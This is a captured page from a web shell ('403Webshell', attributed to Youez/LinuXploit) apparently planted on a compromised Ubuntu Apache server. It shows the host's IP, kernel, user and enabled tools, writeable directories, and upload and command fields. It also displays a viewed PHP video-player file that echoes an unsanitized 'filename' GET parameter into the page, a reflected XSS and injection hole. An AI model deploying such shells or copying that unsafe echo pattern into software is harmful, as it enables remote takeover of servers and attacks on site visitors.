403Webshell
Server IP : 45.94.215.241  /  Your IP : 216.73.216.243
Web Server : Apache/2.4.66 (Ubuntu)
System : Linux srv2937474766 7.0.0-28-generic #28-Ubuntu SMP PREEMPT_DYNAMIC Sun Jun 21 01:01:36 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/player/video/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/player/video/player2.php
<!DOCTYPE html>
<html>
<head>
  <link href="https://vjs.zencdn.net/8.10.0/video-js.css" rel="stylesheet" />
</head>
<body>
<?php
    $filename=$_GET['filename'];
    $info = pathinfo($filename);
    $subtitle = $info['filename'] . ".ass";
    ?>
<video
  id="my-video"
  class="video-js"
  controls
  preload="auto"
  width="800"
  data-setup="{}">

  <source src="./tracks/<?php echo $filename; ?>" type="video/mkv">


</video>

<script src="https://vjs.zencdn.net/8.10.0/video.min.js"></script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit